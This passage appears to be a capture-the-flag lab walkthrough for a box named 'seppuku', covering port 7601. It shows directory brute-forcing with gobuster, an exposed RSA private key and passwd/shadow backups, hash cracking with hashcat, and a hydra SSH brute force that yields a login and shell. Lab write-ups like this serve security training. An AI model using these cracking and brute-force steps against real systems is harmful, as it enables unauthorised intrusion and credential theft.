6 :7601

http://192.168.131.90:7601/
Landing Page with same image as 8088

$ gobuster dir -u http://192.168.131.90:7601 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/index.html           (Status: 200) [Size: 171]
/b                    (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/b/]
/c                    (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/c/]
/a                    (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/a/]
/t                    (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/t/]
/d                    (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/d/]
/r                    (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/r/]
/f                    (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/f/]
/e                    (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/e/]
/h                    (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/h/]
/w                    (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/w/]
/q                    (Status: 301) [Size: 319] [--> http://192.168.131.90:7601/q/]
/database             (Status: 301) [Size: 326] [--> http://192.168.131.90:7601/database/]
/production           (Status: 301) [Size: 328] [--> http://192.168.131.90:7601/production/]
/keys                 (Status: 301) [Size: 322] [--> http://192.168.131.90:7601/keys/]
/secret               (Status: 301) [Size: 324] [--> http://192.168.131.90:7601/secret/]
/stg                  (Status: 301) [Size: 321] [--> http://192.168.131.90:7601/stg/]

# most dirs are just empty

http://192.168.131.90:7601/keys/
Name	Last modified	Size	Description
private	2020-05-13 05:28 	1.6K	 
private.bak	2020-05-13 05:28 	1.6K	 

# both contain same data
http://192.168.131.90:7601/keys/private
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAypJlwjKXf0F4YvL2gfwvoUuvB7fuGMMfCe41gLCsTsleOUy2
CJX+oNwVVKPpl6TYI4nXPGbiwfGzoxm0FZa7D9yr83OgwuvMMp83OkVcwL9v+x7a
tK8AAVZ0NjvOPGkvEhB2rPS2mKg1xRKXCM7pA0KSOoDbk9coOpadjg4G0f1YPWrw
p6iLfIErfY2+5hS7QyTQpuRmHuR4eKLF1NFRp8gYuNCVtr0n2Uu6hWuI7RWBGQZJ
Joj8LKjfRRYmKGpyqiGTdRy+8yCyAuT55shuCzXuc+/3HE2jACOD8+pSPKjwxzm4
fuaSfBTUkHfyhiSKIkop2YfIDLKRPM8dGn5zuQIDAQABAoIBADM+s7Vb3Q1ZP54w
foHFjTsNjVqzge0Lt1doxmomx4Aq2sY+DLLBVyfUZSUDTj2JexAKd8OU93o+rcXt
46uudOX/WhR9RMbqpb6MnokEMQGlrCtn08Xvm127RCzQFk0cAsdcGNmKEoMt0mRn
XoPg6/tiJOHd5S5SOKARqAveqoUGUYI3xgsiRpj8CCRIDUgHi9J0++qUeauVw3m3
lvyTnUTw0uf5+sRkI173CUY+ygJapGM7Lg59xzcjEq5H4so0IztQo3o/pOIfeS6W
bqIpY7D63YBGLgpi9JcN/d2bSfafkfhcrAcjPjRXwEFPmYjMbsTBOKcTtCSDVo6/
ho6fTl0CgYEA9F1uIkqxFKIMt2/uK4/1gPOXy/1cjxcsFoah0Ql7d0gj26H6AgXk
nPncIoO1kojPnB+TUy4qz+Bd7teDbkHSaWNJYIVJZQbvskstwgL4+XamiWrJA/Jp
h7y0I0zRxCMBj5yhBNrp6P+f8vtVMpjbKV17jfe6aakfyuayPugHHh8CgYEA1DeM
4lR/+/fUbxtws+aTx8h9TwisYq38D39KNsWkynnb+9pnLCbVbVETtv4sfD/aQfah
R7CxOG+mD4Vryjpk/wwzZeUDzcQpiTx4RsgP6MkFU8knORKfBdimaUpiasWlNWgy
caXR/iA6EmA4jht8vf/+UOUV8GXV9VqDIWUhgycCgYEAvJaGcqyWMUhG7CLT+oal
f5l/Iw0rq7rEabYJmBvrT0k7czt0iK8nmgYy3+gp7ybqoqCzwFQ28itEExn78tGV
o4Pek0EKPY+22TCv5bUJlOz+5bql3AfvbbQyibO1h9tETyMgGXEhaJIvTQSu4deZ
/DiLLCttkDHXuW2FTosfQx0CgYEAkhGOSjapRRBHSxaTE3Cw5UFNZvnsVZu1tCEE
PwD5NVh9HzQr8YrlOnIk5L68deUpYF/WkNbAlLzcizBlifN5kseeFRN188qCYHCb
xPRtZuf+X7ZD5he4FzkRCcXmSeGynjkTB4CAMq+R6RYLt1yaFtk9/gZAfJBLna5o
NbM7Rt8CgYA5oPRfIpKZ5G9LJEAsBUONgBsrpXs+816ZEvBGsqPs/NPhhZMFetKm
RXxYAiEUudMsahP4Woeuxy8kWfM2J2ltwC/HRFuKnKfsHBhsn/FilspYfrafr985
tFnL/K9Z8le1saEGjwCu6zKto7CaFjj2D4Y9ji0sHGBO+tVbtmU/Jg==
-----END RSA PRIVATE KEY-----

http://192.168.131.90:7601/secret/
[ICO]	Name	Last modified	Size	Description
[ ]	hostname	2020-05-13 03:41 	8 	 
[IMG]	jack.jpg	2018-09-12 03:49 	58K	 
[ ]	passwd.bak	2020-05-13 03:47 	2.7K	 
[ ]	password.lst	2020-05-13 03:59 	672 	 
[ ]	shadow.bak	2020-05-13 03:48 	1.4K	 

http://192.168.131.90:7601/secret/hostname
seppuku

http://192.168.131.90:7601/secret/password.lst
contains a password list

$ curl http://192.168.131.90:7601/secret/passwd.bak
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
cups-pk-helper:x:111:118:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
rabbit-hole:x:1001:1001:,,,:/home/rabbit-hole:/bin/bash

$ curl http://192.168.131.90:7601/secret/shadow.bak
r@bbit-hole:$6$2/SxUdFc$Es9XfSBlKCG8fadku1zyt/HPTYz3Rj7m4bRzovjHxX4WmIMO7rz4j/auR/V.yCPy2MKBLBahX29Y3DWkR6oT..:18395:0:99999:7:::

$ hashcat -m 1800  hash /usr/share/wordlists/rockyou.txt --show
$6$2/SxUdFc$Es9XfSBlKCG8fadku1zyt/HPTYz3Rj7m4bRzovjHxX4WmIMO7rz4j/auR/V.yCPy2MKBLBahX29Y3DWkR6oT..:a1b2c3

rabbit-hole & r@bbit-hole:
# ssh fails with pass a1b2c3
# ssh via private key also fails
# password.lst brute fails

Trying user: seppuku maybe?
# ssh fails with pass a1b2c3
# ssh via private key also fails
$ hydra -l seppuku -P password.lst ssh://192.168.131.90 -t 4 -s 22 -v

[22][ssh] host: 192.168.131.90   login: seppuku   password: eeyoree

$ ssh seppuku@192.168.131.90

seppuku@seppuku:~$ whoami;id;hostname;uname -a
seppuku
uid=1000(seppuku) gid=1000(seppuku) groups=1000(seppuku),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
seppuku
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
Previous7 box enum seppuku Next5 :7080
Last updated 2 years ago